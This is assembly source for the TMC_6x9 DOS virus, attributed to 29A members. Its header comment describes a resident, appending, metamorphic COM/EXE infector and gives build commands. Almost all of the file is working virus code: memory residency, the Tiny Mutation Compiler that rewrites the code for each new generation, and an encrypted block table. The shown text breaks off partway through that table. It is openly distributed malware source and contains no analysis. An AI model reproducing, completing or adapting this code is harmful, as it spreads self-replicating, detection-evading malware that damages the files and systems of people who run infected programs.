ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[tmc_6x9.asm]ÄÄÄ comment * TMC_6x9 ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ Disassembly by ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ Super/29A and Darkman/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ TMC_6x9 is a 5393 bytes resident appending COM and EXE virus. Infects at open file, close file and load and/or execute program. TMC_6x9 has an error handler, retro structures and is metamorphic in file and memory using Tiny Mutation Compiler v 1.00 [TMC]. To compile TMC_6x9 with Turbo Assembler v 5.0 type: TASM /M TMC_6X9.ASM TLINK /x TMC_6X9.OBJ EXE2BIN TMC_6X9.EXE TMC_6X9.COM * .model tiny .code code_begin: db 10001101b,00101110b ; LEA BP,[imm16] (opcode 8dh,2eh) dw 100h ; Delta offset cld ; Clear direction flag mov ax,ds ; AX = segment of PSP for current ... mov [bp+program_seg],ax ; Store segment of PSP for current... dec ax ; AX = segment of current Memory C... mov ds,ax ; DS = segment of current Memory C... mov ax,ds:[03h] ; AX = size of memory block in par... cmp ax,1900h ; Insufficient memory? jae resize_mem ; Above or equal? Jump to resize_mem jmp terminate resize_mem: push cs ; Save CS at stack pop ds ; Load DS from stack (CS) mov [bp+mcb_size_],ax ; Store size of memory block in p... mov bx,[bp+new_mcb_size] mov ah,4ah ; Resize memory block int 21h jnc allocate_mem ; No error? Jump to allocate_mem jmp terminate allocate_mem: mov ah,48h ; Allocate memory mov bx,[bp+mcb_size_] ; BX = size of memory block in par... sub bx,[bp+new_mcb_size] dec bx ; BX = number of paragraphs to all... cmp bx,267h ; Insufficient memory? jae allocat_mem ; Above or equal? Jump to allocat_mem jmp terminate allocat_mem: int 21h jnc initiali_tmc ; No error? Jump to initiali_tmc jmp terminate initiali_tmc: mov es,ax ; ES = segment of allocated memory add es:[02h],6942h ; Store 16-bit random number mov word ptr es:[0ch],00h mov es:[04h],118h ; Store offset of block information mov es:[06h],2c8h ; Store offset of CALL; JMP; Jcc i... mov es:[08h],5a8h ; Store offset of data information lea si,[bp+tmc_table] ; SI = offset of tmc_table push si ; Save SI at stack mov bx,730h ; BX = offset of next virus genera... jmp initial_tmc initial_tmc: mov di,10h ; DI = offset of table of blocks xor ax,ax ; Zero AX jmp tmc_ini_loop tmc_ini_loop: add si,ax ; SI = offset of block or instruct... call decrypt_byte or al,al ; End of table? jz calc_blocks ; Zero? Jump to calc_blocks nop nop nop cmp al,11101000b ; CALL; JMP; Data reference; Jcc? jae exam_block ; Above or equal? Jump to exam_block nop nop nop cmp al,10h ; Data? jbe tmc_ini_loop ; Below or equal? Jump to tmc_ini_... nop nop nop sub al,10h ; AL = length of data jmp tmc_ini_loop exam_block: cmp al,11101111b ; End of block? jne exam_block_ ; Not equal? Jump to exam_block_ nop nop nop mov al,00h ; Don't add anything to offset wit... jmp tmc_ini_loop exam_block_: cmp al,11101110b ; Beginning of block? jne next_byte ; Not equal? Jump to next_byte nop nop nop mov ax,si ; AX = offset of block identification dec ax ; AX = offset of block within table stosw ; Store offset of block within table mov ax,0ffffh ; Block is still in one part stosw ; Store block identification mov ax,02h ; Add two to offset within table jmp tmc_ini_loop next_byte: mov al,02h ; Add two to offset within table jmp tmc_ini_loop calc_blocks: lea ax,[di-10h] ; AX = number of blocks multiplied... shr ax,01h ; Divide number of blocks by two shr ax,01h ; Divide number of blocks by two mov es:[0ah],ax ; Store number of blocks xor ax,ax ; End of table stosw ; Store end of table mov di,10h ; DI = offset of table of blocks mov si,es:[di] ; SI = offset of block within table jmp exam_bloc split_block: push bp ; Save BP at stack mov bp,es:[0ah] ; BP = number of blocks call rnd_in_range pop bp ; Load BP from stack shl ax,01h ; Multiply random number with two shl ax,01h ; Multiply random number with two add ax,10h ; Add ten to random number mov di,ax ; DI = random offset within table jmp exam_nxt_blo exam_nxt_blo: add di,04h ; DI = offset of next offset withi... mov si,es:[di] ; SI = offset of next block within... or si,si ; End of table? jnz exam_block__ ; Not zero? Jump to exam_block__ nop nop nop mov di,10h ; DI = offset of table of blocks mov si,es:[di] ; SI = offset of block within table jmp exam_block__ exam_block__: push ax ; Save AX at stack call decrypt_byte dec si ; Decrease offset of block within ... cmp al,11101111b ; End of block? pop ax ; Load AX from stack jne exam_bloc ; Not equal? Jump to exam_bloc nop nop nop cmp di,ax ; End of table of blocks? jne exam_nxt_blo ; Not equal? Jump to exam_nxt_blo nop nop nop jmp exam_tbl_inf exam_bloc: mov ax,es:[di+02h] ; AX = block information cmp ax,0ffffh ; Block is still in one part? je exam_bloc_ ; Equal? Jump to exam_bloc_ nop nop nop push di ; Save DI at stack mov di,ax ; DI = offset of end of first part... mov al,11101001b ; JMP imm16 (opcode 0e9h) stosb ; Store JMP imm16 mov ax,bx ; AX = offset within next virus ge... dec ax ; Decrease offset within next viru... dec ax ; Decrease offset within next viru... sub ax,di ; Subtract offset of end of first ... stosw ; Store 16-bit immediate pop di ; Load DI from stack jmp exam_bloc_ exam_bloc_: call decrypt_byte cmp al,11101111b ; End of block? jne exam_bloc__ ; Not equal? Jump to exam_bloc__ jmp end_of_block exam_bloc__: cmp al,10h ; Data; CALL; JMP; Data reference...? ja exam_bloc___ ; Above? Jump to exam_bloc___ nop nop nop push ax bp ; Save registers at stack mov bp,[bp+probability] ; BP = probability call rnd_in_range or ax,ax ; Split up block? pop bp ax ; Load registers from stack jz split_block ; Zero? Jump to split_block nop nop nop jmp exam_bloc___ exam_bloc___: cmp al,11101111b ; End of block? jne exam_blo ; Not equal? Jump to exam_blo jmp end_of_block exam_blo: cmp al,11101000b ; CALL; JMP; Data reference; Jcc? jae exam_data ; Above or equal? Jump to exam_data nop nop nop cmp al,10h ; Data? jbe sto_instruct ; Below or equal? Jump to sto_inst... nop nop nop sub al,10h ; AL = length of data jmp sto_instruct sto_instruct: xor cx,cx ; Zero CX mov cl,al ; CL = length of instruction push di ; Save DI at stack mov di,bx ; DI = offset within next virus ge... jmp sto_ins_loop sto_ins_loop: call decrypt_byte stosb ; Store byte of instruction dec cx ; Decrease counter jnz sto_ins_loop ; Not zero? Jump to sto_ins_loop nop nop nop mov bx,di ; BX = offset within next virus ge... pop di ; Load DI from stack jmp exam_bloc_ exam_data: cmp al,11101101b ; Data reference? jne exam_blo_ ; Not equal? Jump to exam_blo_ nop nop nop push di ; Load DI from stack mov di,es:[08h] ; DI = offset within data information mov ax,bx ; AX = offset within next virus ge... dec ax ; Decrease offset within next viru... dec ax ; Decrease offset within next viru... stosw ; Store offset within next virus g... call decrypt_id stosw ; Store block identification mov es:[08h],di ; Store offset within data informa... pop di ; Load DI from stack jmp exam_bloc_ exam_blo_: cmp al,11101110b ; Beginning of block? jne sto_call_jmp ; Not equal? Jump to sto_call_jmp nop nop nop push di ; Save DI at stack mov di,es:[04h] ; DI = offset within block informa... mov ax,bx ; AX = offset within next virus ge... stosw ; Store offset within next virus g... call decrypt_id stosw ; Store block identification mov es:[04h],di ; Store offset within block inform... cmp ax,4c5h ; Block identification of tmc_table_? jne exam_message ; Not equal? Jump to exam_message nop nop nop push si ; Save SI at stack mov di,bx ; DI = offset within next virus ge... lea si,[bp+tmc_table] ; SI = offset of tmc_table mov cx,(table_end-table_begin) rep movsb ; Move table to top of memory mov bx,di ; BX = offset within next virus ge... pop si ; Load SI from stack jmp examine_next exam_message: cmp ax,2328h ; Block identification of message? jne exam_probabi ; Not equal? Jump to exam_probabi nop nop nop mov ax,14h ; Probability of including message cmp [bp+probability],ax ; Include message? jae examine_next ; Above or equal? Jump to examine_... nop nop nop call decrypt_byte sub al,10h ; AL = length of message mov ah,00h ; Zero AH add si,ax ; SI = offset of end of message jmp examine_next exam_probabi: cmp ax,0bech ; Block identification of probabi...? jne examine_next ; Not equal? Jump to examine_next nop nop nop mov ax,[bp+probability] ; AX = probability dec ax ; Decrease probability cmp ax,05h ; Probability too small? jae store_probab ; Above or equal? Jump to store_pr... nop nop nop mov ax,64h ; Reset probability jmp store_probab store_probab: mov es:[bx],ax ; Store probability add bx,02h ; Add two to offset within next vi... add si,03h ; SI = offset of beginning of next... jmp examine_next examine_next: pop di ; Load DI from stack call decrypt_byte jmp exam_bloc___ sto_call_jmp: push ax di ; Save registers at stack mov di,es:[06h] ; DI = offset within CALL; JMP; Jc... mov ax,bx ; AX = offset within next virus ge... stosw ; Store offset within next virus g... call decrypt_id stosw ; Store block identification mov es:[06h],di ; Store offset within CALL; JMP; J... pop di ax ; Load registers from stack mov es:[bx],al ; Store CALL imm16; JMP imm16; Jcc... add bx,03h ; Add three to offset within next ... cmp al,11110000b ; Jump condition? jae jcc_imm8 ; Above or equal? Jump to jcc_imm8 jmp exam_bloc_ jcc_imm8: inc bx ; Increase offset within next viru... inc bx ; Increase offset within next viru... jmp exam_bloc_ split_block_: mov es:[di+02h],bx ; Store offset within next virus g... add bx,03h ; Add three to offset within next ... jmp end_of_block end_of_block: dec si ; Decrease offset of block within ... mov es:[di],si ; Store offset of block within table jmp split_block exam_tbl_inf: cmp word ptr es:[0ch],00h jne correct_i16 ; End of second table? Jump to cor... nop nop nop pop si ; Load SI from stack mov es:[0ch],bx ; Store offset within next virus g... add si,(second_table-first_table) jmp initial_tmc correct_i16: push es ; Save ES at stack pop ds ; Load DS from stack (ES) sub bx,730h ; Subtract offset of next virus ge... mov ds:[0eh],bx ; Store length of virus mov si,2c8h ; SI = offset of CALL; JMP; Jcc im... mov cx,ds:[06h] ; CX = offset of end of CALL; JMP;... sub cx,si ; Subtract offset of CALL; JMP; Jc... shr cx,01h ; Divide number of CALL imm16; JMP... shr cx,01h ; Divide number of CALL imm16; JMP... jmp jmp_call_loo jmp_call_loo: lodsw ; AX = offset of block within data... push ax ; Save AX at stack lodsw ; AX = offset of block within data... push cx si ; Save registers at stack mov si,118h ; SI = offset of block information mov cx,ds:[04h] ; CX = offset of end of block info... sub cx,si ; Subtract offset of block informa... shr cx,01h ; Divide number of block by two shr cx,01h ; Divide number of block by two jmp find_block find_block: cmp ax,[si+02h] ; Found block? je found_block ; Equal? Jump to found_block nop nop nop add si,04h ; SI = offset of next block in table dec cx ; Decrease counter jnz find_block ; Not zero? Jump to find_block nop nop nop found_block: mov dx,[si] ; DX = offset of block pop si cx ; Load registers from stack pop bx ; Load BX from stack (AX) mov al,[bx] ; AL = first byte of instruction cmp al,11110000b ; Jump condition? jb sto_call_jm ; Below? Jump to sto_call_jm nop nop nop sub byte ptr [bx],10000000b inc bx ; BX = offset of 8-bit immediate push dx ; Save DX at stack sub dx,bx ; Subtract offset within next viru... dec dx ; Decrease 8-bit immediate cmp dx,7fh ; 8-bit immediate out of range? jg invert_jcc ; Greater? Jump to invert_jcc nop nop nop cmp dx,0ff80h ; 8-bit immediate out of range? jl invert_jcc ; Less? Jump to invert_jcc nop nop nop mov [bx],dl ; Store 8-bit immediate inc bx ; BX = offset of end of Jcc imm8 mov [bx],1001000010010000b mov byte ptr [bx+02h],10010000b pop dx ; Load DX from stack jmp correct_i16_ invert_jcc: pop dx ; Load DX from stack dec bx ; BX = offset of Jcc imm8 xor byte ptr [bx],00000001b inc bx ; BX = offset of 8-bit immediate mov byte ptr [bx],03h ; Store 8-bit immediate inc bx ; BX = offset of JMP imm16 mov al,11101001b ; JMP imm16 (opcode 0e9h) jmp sto_call_jm sto_call_jm: mov [bx],al ; Store CALL imm16; JMP imm16 inc bx ; BX = offset of 16-bit immediate sub dx,bx ; Subtract offset within next viru... dec dx ; Decrease 16-bit immediate dec dx ; Decrease 16-bit immediate mov [bx],dx ; Store 16-bit immediate jmp correct_i16_ correct_i16_: dec cx ; Decrease counter jnz jmp_call_loo ; Not zero? Jump to jmp_call_loo nop nop nop mov si,5a8h ; SI = offset of data information mov cx,ds:[08h] ; CX = offset of end of data infor... sub cx,si ; Subtract offset of data informat... shr cx,01h ; Divide number of data references... shr cx,01h ; Divide number of data references... jmp data_ref_loo data_ref_loo: lodsw ; AX = offset of block within data... push ax ; Save AX at stack lodsw ; AX = offset of block within data... push cx si ; Save registers at stack mov si,118h ; SI = offset of block information mov cx,ds:[04h] ; CX = offset of end of block info... sub cx,si ; Subtract offset of block informa... shr cx,01h ; Divide number of block by two shr cx,01h ; Divide number of block by two jmp find_block_ find_block_: cmp ax,[si+02h] ; Found block? je found_block_ ; Equal? Jump to found_block_ nop nop nop add si,04h ; SI = offset of next block in table dec cx ; Decrease counter jnz find_block_ ; Not zero? Jump to find_block_ nop nop nop found_block_: mov ax,[si] ; AX = offset of block pop si cx ; Load registers from stack pop bx ; Load BX from stack (AX) sub ax,730h ; Subtract offset of next virus ge... mov [bx],ax ; Store 16-bit immediate dec cx ; Decrease counter jnz data_ref_loo ; Not zero? Jump to data_ref_loo nop nop nop jmp restore_code restore_code: mov ax,[bp+program_seg] ; AX = segment of PSP for current ... mov cx,[bp+initial_ss] ; CX = initial SS relative to star... add cx,10h ; Add ten to initial SS relative t... add cx,ax ; Add segment of PSP for current p... push cx ; Save CX at stack push [bp+initial_sp] ; Save initial SP at stack mov cx,[bp+initial_cs] ; CX = initial CS relative to star... add cx,10h ; Add ten to initial CS relative t... add cx,ax ; Add segment of PSP for current p... push cx ; Save CX at stack push [bp+initial_ip] ; Save initial IP at stack push ax ; Save segment of PSP for current ... push [bp+mcb_size] ; Save size of memory block in par... push ds ; Save DS at stack mov cl,00h ; COM executable cmp [bp+executa_stat],cl jne move_virus ; COM executable? Jump to move_virus nop nop nop lea si,[bp+origin_code] ; SI = offset of origin_code mov ax,cs:[si] ; AX = first two bytes of original... mov cs:[100h],ax ; Store first two bytes of origina... mov al,cs:[si+02h] ; AL = last byte of original code ... mov cs:[100h+02h],al ; Store last byte of original code... jmp move_virus mov ax,[bp+program_seg] ; AX = segment of PSP for current ... mov cx,[bp+initial_ss] ; CX = initial SS relative to star... add cx,10h ; Add ten to initial SS relative t... add cx,ax ; Add segment of PSP for current p... push cx ; Save CX at stack push [bp+initial_sp] ; Save initial SP at stack mov cx,[bp+initial_cs] ; CX = initial CS relative to star... add cx,10h ; Add ten to initial CS relative t... add cx,ax ; Add segment of PSP for current p... push cx ; Save CX at stack push [bp+incorrect_ip] ; Save incorrect IP at stack push ax ; Save segment of PSP for current ... push [bp+mcb_size] ; Save size of memory block in par... push ds ; Save DS at stack mov cl,00h ; COM executable cmp [bp+executa_stat],cl jne move_virus ; COM executable? Jump to move_virus nop nop nop lea si,[bp+incorr_code] ; SI = offset of incorr_code mov ax,cs:[si] ; AX = first two bytes of incorrec... mov cs:[100h],ax ; Store first two bytes of incorre... mov al,cs:[si+02h] ; AL = last byte of incorrect code mov cs:[100h+02h],al ; Store last byte of incorrect code jmp move_virus move_virus: xor ax,ax ; Zero AX mov ds,ax ; DS = segment of DOS communicatio... cmp byte ptr ds:[501h],10h jne move_virus_ ; Already resident? Jump to move_v... jmp virus_exit move_virus_: mov byte ptr ds:[501h],10h push es ; Save ES at stack pop ds ; Load DS from stack (ES) mov ax,ds:[0ch] ; AX = offset within next virus ge... sub ax,730h ; Subtract offset of next virus ge... mov [bp+vir_exit_off],ax mov cx,ds:[0eh] ; CX = length of virus mov [bp+virus_length],cx mov si,730h ; SI = offset of next virus genera... xor di,di ; Zero DI rep movsb ; Move virus to top of memory mov cl,04h ; Divide by paragraphs shr di,cl ; DI = length of next virus genera... inc di ; Increase length of next virus ge... mov bx,[bp+mcb_size_] ; BX = size of memory block in par... sub bx,[bp+new_mcb_size] sub bx,di ; Subtract length of next virus ge... dec bx ; Decrease new size in paragraphs dec bx ; Decrease new size in paragraphs cmp bx,di ; Insufficient memory? jae resize_mem_ ; Above or equal? Jump to resize_mem_ jmp virus_exit resize_mem_: mov ah,4ah ; Resize memory block int 21h jnc allocat_mem_ ; No error? Jump to allocat_mem_ jmp virus_exit allocat_mem_: mov bx,di ; BX = number of paragraphs to all... mov ah,48h ; Allocate memory int 21h jc virus_exit ; Error? Jump to virus_exit nop nop nop dec ax ; AX = segment of current Memory C... mov es,ax ; ES = segment of current Memory C... mov word ptr es:[01h],08h inc ax ; AX = segment of PSP for current ... mov es,ax ; AX = segment of PSP for current ... mov cx,[bp+virus_length] xor si,si ; Zero SI xor di,di ; Zero DI rep movsb ; Move virus to top of memory push es ; Save ES at stack push word ptr [bp+vir_exit_off] mov al,[bp+crypt_key] ; AL = 8-bit encryption/decryption... mov ah,byte ptr [bp+sliding_key] retf ; Return far terminate: mov ax,4c00h ; Terminate with return code int 21h get_rnd_num proc near ; Get 16-bit random number push cx ; Save CX at stack in al,40h ; AL = 8-bit random number mov ah,al ; AH = 8-bit random number in al,40h ; AL = 8-bit random number xor ax,es:[02h] ; AX = 16-bit random number mov cl,ah ; CL = high-order byte of 16-bit r... rol ax,cl ; AX = 16-bit random number mov es:[02h],ax ; Store 16-bit random number pop cx ; Load CX from stack ret ; Return endp rnd_in_range proc near ; Random number within range or bp,bp ; Zero BP? jz zero_range ; Zero? Jump to zero_range nop nop nop push dx ; Save DX at stack call get_rnd_num xor dx,dx ; Zero DX div bp ; DX = random number within range xchg ax,dx ; AX = random number within range pop dx ; Load DX from stack ret ; Return zero_range: xor ax,ax ; AX = random number within range ret ; Return endp decrypt_byte proc near ; Decrypt byte of table mov [bp+ah_],ah ; Store AH mov ax,si ; AX = offset within table sub ax,bp ; Subtract delta offset from offse... sub ax,offset tmc_table ; Subtract offset of tmc_table fro... mul word ptr [bp+sliding_key] add al,[bp+crypt_key] ; AL = 8-bit encryption/decryption... xor al,[si] ; AL = byte of decrypted table mov ah,[bp+ah_] ; AH = stored AH inc si ; Increase offset within table ret ; Return endp decrypt_id proc near ; Decrypt block identification in ... call decrypt_byte mov ah,al ; AL = byte of decrypted table call decrypt_byte xchg al,ah ; AL = byte of decrypted table ret ; Return endp virus_exit: pop es ; Load ES from stack mov ah,49h ; Free memory int 21h pop bx ; Load BX from stack pop ax ; Load AX from stack mov ds,ax ; DS = segment of PSP for current ... mov es,ax ; DS = segment of PSP for current ... mov ah,4ah ; Resize memory block int 21h lea bx,[bp+jmp_imm32] ; BX = offset of jmp_imm32 pop ax ; Load AX from stack (initial IP) mov cs:[bx+01h],ax ; Store initial IP pop ax ; Load AX from stack (initial CS ...) mov cs:[bx+03h],ax ; Store initial CS relative to sta... pop ax ; Load AX from stack (initial SP) pop ss ; Load SS from stack (initial SS ...) mov sp,ax ; SP = stack pointer jmp jmp_imm32 jmp_imm32 equ $ ; Offset of JMP imm32 (opcode 0eah) db 11101010b ; JMP imm32 (opcode 0eah) dd 00h ; Pointer to virus in top of memory ah_ db 00h ; Accumulator register (high-orde...) probability dw 32h ; Probability crypt_key db 00h ; 8-bit encryption/decryption key sliding_key dw 00h ; 8-bit sliding encryption/decrypt... executa_stat db 00h ; Executable status origin_code db 11000011b,02h dup(00h) incorr_code db 11000011b,02h dup(00h) initial_cs dw 0fff0h ; Initial CS relative to start of ... initial_ss dw 0fff0h ; Initial SS relative to start of ... initial_ip dw 100h ; Initial IP incorrect_ip dw 100h ; Incorrect IP initial_sp dw 0fffeh ; Initial SP new_mcb_size dw 1000h ; New size in paragraphs mcb_size dw 0ffffh ; Size of memory block in paragraphs mcb_size_ dw 00h ; Size of memory block in paragraphs program_seg dw 00h ; Segment of PSP for current process virus_length dw 00h ; Length of virus vir_exit_off dw 00h ; Offset of virus_exit table_begin: first_table: tmc_table db 11101111b ; End of block db 11101110b ; Beginning of block dw 00h ; Block identification of tmc_table db 04h ; Four bytes instruction db 10001101b,00101110b ; LEA BP,[imm16] (opcode 8dh,2eh) dw 1234h ; Delta offset db 01h ; One byte instruction cld ; Clear direction flag db 02h ; Two bytes instruction mov ax,ds ; AX = segment of PSP for current ... db 04h ; Four bytes instruction mov [bp+1234h],ax ; Store segment of PSP for current... db 11101101b ; Data reference dw 0befh ; Pointer to program_seg_ db 01h ; One byte instruction dec ax ; AX = segment of current Memory C... db 02h ; Two bytes instruction mov ds,ax ; DS = segment of current Memory C... db 03h ; Three bytes instruction mov ax,ds:[03h] ; AX = size of memory block in par... db 03h ; Three bytes instruction cmp ax,1900h ; Insufficient memory? db 01110010b+10000000b ; Below? Jump to terminate_ dw 0beeh ; Pointer to terminate_ db 01h ; One byte instruction push cs ; Save CS at stack db 01h ; One byte instruction pop ds ; Load DS from stack (CS) db 04h ; Four bytes instruction mov [bp+1234h],ax ; Store size of memory block in p... db 11101101b ; Data reference dw 1394h ; Pointer to mcb_size___ db 04h ; Four bytes instruction mov bx,[bp+1234h] ; BX = new size in paragraphs db 11101101b ; Data reference dw 1393h ; Pointer to new_mcb_siz db 02h ; Two bytes instruction mov ah,4ah ; Resize memory block db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to terminate_ dw 0beeh ; Pointer to terminate_ db 02h ; Two bytes instruction mov ah,48h ; Allocate memory db 04h ; Four bytes instruction mov bx,[bp+1234h] ; BX = size of memory block in par... db 11101101b ; Data reference dw 1394h ; Pointer to mcb_size___ db 04h ; Four bytes instruction sub bx,[bp+1234h] ; Subtract new size in paragraphs ... db 11101101b ; Data reference dw 1393h ; Pointer to new_mcb_siz db 01h ; One byte instruction dec bx ; BX = number of paragraphs to all... db 04h ; Four bytes instruction cmp bx,267h ; Insufficient memory? db 01110010b+10000000b ; Below? Jump to terminate_ dw 0beeh ; Pointer to terminate_ db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to terminate_ dw 0beeh ; Pointer to terminate_ db 02h ; Two bytes instruction mov es,ax ; ES = segment of allocated memory db 07h ; Seven bytes instruction add es:[02h],6942h ; Store 16-bit random number db 07h ; Seven bytes instruction mov word ptr es:[0ch],00h db 07h ; Seven bytes instruction mov es:[04h],118h ; Store offset of block information db 07h ; Seven bytes instruction mov es:[06h],2c8h ; Store offset of CALL; JMP; Jcc i... db 07h ; Seven bytes instruction mov es:[08h],5a8h ; Store offset of data information db 04h ; Four bytes instruction lea si,[bp+1234h] ; SI = offset of tmc_table_ db 11101101b ; Data reference dw 4c5h ; Pointer to tmc_table_ db 01h ; One byte instruction push si ; Save SI at stack db 03h ; Three bytes instruction mov bx,730h ; BX = offset of next virus genera... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0fa0h ; Pointer to initial_tmc db 11101111b ; End of block initial_tmc_ db 11101110b ; Beginning of block dw 0fa0h ; Block identification of initial_... db 03h ; Three bytes instruction mov di,10h ; DI = offset of table of blocks db 02h ; Two bytes instruction xor ax,ax ; Zero AX db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bb8h ; Pointer to tmc_ini_loo db 11101111b ; End of block tmc_ini_loo db 11101110b ; Beginning of block dw 0bb8h ; Block identification of tmc_ini_loo db 02h ; Two bytes instruction add si,ax ; SI = offset of block or instruct... db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 02h ; Two bytes instruction or al,al ; End of table? db 01110100b+10000000b ; Zero? Jump to calc_blocks_ dw 0bbch ; Pointer to calc_blocks_ db 02h ; Two bytes instruction cmp al,11101000b ; CALL; JMP; Data reference; Jcc? db 01110011b+10000000b ; Above or equal? Jump to exam_blo__ dw 0bb9h ; Pointer to exam_blo__ db 02h ; Two bytes instruction cmp al,10h ; Data? db 01110110b+10000000b ; Below or equal? Jump to tmc_ini_... dw 0bb8h ; Pointer to tmc_ini_loo db 02h ; Two bytes instruction sub al,10h ; AL = length of data db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bb8h ; Pointer to tmc_ini_loo db 11101111b ; End of block exam_blo__ db 11101110b ; Beginning of block dw 0bb9h ; Block identification of exam_blo__ db 02h ; Two bytes instruction cmp al,11101111b ; End of block? db 01110101b+10000000b ; Not equal? Jump to exam_blo___ dw 0bbah ; Pointer to exam_blo___ db 02h ; Two bytes instruction mov al,00h ; Don't add anything to offset wit... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bb8h ; Pointer to tmc_ini_loo db 11101111b ; End of block exam_blo___ db 11101110b ; Beginning of block dw 0bbah ; Block identification of exam_blo___ db 02h ; Two bytes instruction cmp al,11101110b ; Beginning of block? db 01110101b+10000000b ; Not equal? Jump to next_byte_ dw 0bbbh ; Pointer to next_byte_ db 02h ; Two bytes instruction mov ax,si ; AX = offset of block identification db 01h ; One byte instruction dec ax ; AX = offset of block within table db 01h ; One byte instruction stosw ; Store offset of block within table db 03h ; Three bytes instruction mov ax,0ffffh ; Block is still in one part db 01h ; One byte instruction stosw ; Store block identification db 03h ; Three bytes instruction mov ax,02h ; Add two to offset within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bb8h ; Pointer to tmc_ini_loo db 11101111b ; End of block next_byte_ db 11101110b ; Beginning of block dw 0bbbh ; Block identification of next_byte_ db 02h ; Two bytes instruction mov al,02h ; Add two to offset within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bb8h ; Pointer to tmc_ini_loo db 11101111b ; End of block calc_blocks_ db 11101110b ; Beginning of block dw 0bbch ; Block identification of calc_blo... db 03h ; Three bytes instruction lea ax,[di-10h] ; AX = number of blocks multiplied... db 02h ; Two bytes instruction shr ax,01h ; Divide number of blocks by two db 02h ; Two bytes instruction shr ax,01h ; Divide number of blocks by two db 04h ; Four bytes instruction mov es:[0ah],ax ; Store number of blocks db 02h ; Two bytes instruction xor ax,ax ; End of table db 01h ; One byte instruction stosw ; Store end of table db 03h ; Three bytes instruction mov di,10h ; DI = offset of table of blocks db 03h ; Three bytes instruction mov si,es:[di] ; SI = offset of block within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc0h ; Pointer to exam_bl db 11101111b ; End of block split_bloc db 11101110b ; Beginning of block dw 0bbdh ; Block identification of split_bloc db 01h ; One byte instruction push bp ; Save BP at stack db 05h ; Five bytes instruction mov bp,es:[0ah] ; BP = number of blocks db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bd5h ; Pointer to rnd_in_rang db 01h ; One byte instruction pop bp ; Load BP from stack db 02h ; Two bytes instruction shl ax,01h ; Multiply random number with two db 02h ; Two bytes instruction shl ax,01h ; Multiply random number with two db 03h ; Three bytes instruction add ax,10h ; Add ten to random number db 02h ; Two bytes instruction mov di,ax ; DI = random offset within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bbeh ; Pointer to exam_nxt_bl_ db 11101111b ; End of block exam_nxt_bl_ db 11101110b ; Beginning of block dw 0bbeh ; Block identification of exam_nxt... db 03h ; Three bytes instruction add di,04h ; DI = offset of next offset withi... db 03h ; Three bytes instruction mov si,es:[di] ; SI = offset of next block within... db 02h ; Two bytes instruction or si,si ; End of table? db 01110101b+10000000b ; Not zero? Jump to exam_blo____ dw 0bbfh ; Pointer to exam_blo____ db 03h ; Three bytes instruction mov di,10h ; DI = offset of table of blocks db 03h ; Three bytes instruction mov si,es:[di] ; SI = offset of block within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bbfh ; Pointer to exam_blo____ db 11101111b ; End of block exam_blo____ db 11101110b ; Beginning of block dw 0bbfh ; Block identification of exam_blo... db 01h ; One byte instruction push ax ; Save AX at stack db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 01h ; One byte instruction dec si ; Decrease offset of block within ... db 02h ; Two bytes instruction cmp al,11101111b ; End of block? db 01h ; One byte instruction pop ax ; Load AX from stack db 01110101b+10000000b ; Not equal? Jump to exam_bl dw 0bc0h ; Pointer to exam_bl db 02h ; Two bytes instruction cmp di,ax ; End of table of blocks? db 01110101b+10000000b ; Not equal? Jump to exam_nxt_bl_ dw 0bbeh ; Pointer to exam_nxt_bl_ db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bcah ; Pointer to exam_tbl_in db 11101111b ; End of block exam_bl db 11101110b ; Beginning of block dw 0bc0h ; Block identification of exam_bl db 04h ; Four bytes instruction mov ax,es:[di+02h] ; AX = block information db 03h ; Three bytes instruction cmp ax,0ffffh ; Block is still in one part? db 01110100b+10000000b ; Equal? Jump to exam_bl_ dw 0bc1h ; Pointer to exam_bl_ db 01h ; One byte instruction push di ; Save DI at stack db 02h ; Two bytes instruction mov di,ax ; DI = offset of end of first part... db 02h ; Two bytes instruction mov al,11101001b ; JMP imm16 (opcode 0e9h) db 01h ; One byte instruction stosb ; Store JMP imm16 db 02h ; Two bytes instruction mov ax,bx ; AX = offset within next virus ge... db 01h ; One byte instruction dec ax ; Decrease offset within next viru... db 01h ; One byte instruction dec ax ; Decrease offset within next viru... db 02h ; Two bytes instruction sub ax,di ; Subtract offset of end of first ... db 01h ; One byte instruction stosw ; Store 16-bit immediate db 01h ; One byte instruction pop di ; Load DI from stack db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc1h ; Pointer to exam_bl_ db 11101111b ; End of block exam_bl_ db 11101110b ; Beginning of block dw 0bc1h ; Block identification of exam_bl_ db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 02h ; Two bytes instruction cmp al,11101111b ; End of block? db 01110100b+10000000b ; Equal? Jump to end_of_bloc dw 0bc9h ; Pointer to end_of_bloc db 02h ; Two bytes instruction cmp al,10h ; Data; CALL; JMP; Data reference...? db 01110111b+10000000b ; Above? Jump to exam_bl__ dw 0bc2h ; Pointer to exam_bl__ db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction push bp ; Save BP at stack db 04h ; Four bytes 